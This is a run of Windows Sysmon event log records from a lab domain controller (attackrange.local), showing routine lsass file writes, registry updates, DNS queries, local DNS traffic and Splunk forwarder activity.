AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=2313D5E228884E38771C53923B0754D9,SHA256=E529C5BC81C8B303489DDB297E5CD96210622B68E3CF428B20DFC94D02FEDB1B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000003736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.283{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=55AEC771B6D65782E89BC4D2E33DCA75,SHA256=85035B34144008C245E1B2F8E0BB38224A22A96EFE5393DF05ED860D96021EB9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.267{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xaad87873) 13241300x80000000000000003734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.236{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000003733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.236{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000003732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.142{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000617) 22542200x80000000000000003803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.293{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:05.291{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.290{266CAFBE-646A-6064-0B00-00000000AE01}856ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.288{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.287{266CAFBE-646A-6064-0B00-00000000AE01}856DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.275{266CAFBE-646C-6064-1200-00000000AE01}1196wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000003797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.245{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 354300x80000000000000003796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.278{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62162- 354300x80000000000000003795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.276{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55822- 354300x80000000000000003794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.276{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56724- 354300x80000000000000003793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.273{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56470- 354300x80000000000000003792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.272{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57214- 354300x80000000000000003791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.271{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65162- 354300x80000000000000003790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.270{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62710- 354300x80000000000000003789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.270{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55665- 354300x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.269{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60940- 354300x80000000000000003787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.267{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60221- 354300x80000000000000003786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.266{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56505- 354300x80000000000000003785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61444- 354300x80000000000000003784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59124- 354300x80000000000000003783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.262{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54370- 354300x80000000000000003782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.262{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55286- 354300x80000000000000003781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.261{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59747- 354300x80000000000000003780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.260{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57757- 354300x80000000000000003779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61167- 354300x80000000000000003778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55984- 354300x80000000000000003777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62115- 354300x80000000000000003776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64464- 354300x80000000000000003775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.257{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61893- 354300x80000000000000003774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.256{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63365- 354300x80000000000000003773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.254{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58171- 354300x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.253{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local65363- 354300x80000000000000003771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.253{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63279- 354300x80000000000000003770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.251{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62087- 354300x80000000000000003769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local65500- 354300x80000000000000003768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65332- 354300x80000000000000003767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.248{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63502- 354300x80000000000000003766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.247{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60008- 23542300x80000000000000003765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:06.392{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5358D20AF61EBAEC1122E87FE7462E39,SHA256=6E05480E33BB7A217D1131B6E3D190AF37A09D2A7267810055FB92E6FBD63197,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:06.251{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000393) 354300x80000000000000003763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.240{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-892.attackrange.local123ntpfalse51.105.208.173-123ntp 354300x80000000000000003762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.239{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57473- 354300x80000000000000003761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.238{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61359- 354300x80000000000000003760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.238{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63878- 23542300x80000000000000003759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:06.095{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AC1A99A189C9C765785FB643D391BCC,SHA256=DAEDCB6F931D74BC6AAC1557DADB7D19F2CD367D82BE4AB05BA138521CBE0A59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:06.095{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=607328EE21068BA303880E6D9E3E5947,SHA256=CF1545E540B9B2DD354B46442D605EF9378F735F0B896EFCEC186BA2803E36F0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000003813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000003812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000003811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 
23542300x80000000000000003810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.637{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08CAB99AD6E29D1510BD584183ED1DB4,SHA256=D5658D817282ABD825C9B89F7D848C83F8FE325B91906A95B5ADA8410D059DC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.287{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63986- 354300x80000000000000003808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.284{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54451- 354300x80000000000000003807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.283{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62797- 354300x80000000000000003806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.282{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60500- 354300x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.280{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64936- 354300x80000000000000003804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.279{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55237- 13241300x80000000000000003834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.991{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000394) 23542300x80000000000000003833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.867{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4AC4105633F99F1F4F9BB1152683C57,SHA256=896523636D45E2E2D55CB13ECFE4CF84FF9D4F6B6808314B254CDCEF50F7DD5C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000003831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 
13241300x80000000000000003830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000003829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000003828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000003827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000003826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000003825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000003824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000003823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000003822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000003821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-892 10341000x80000000000000003820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:08.244{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 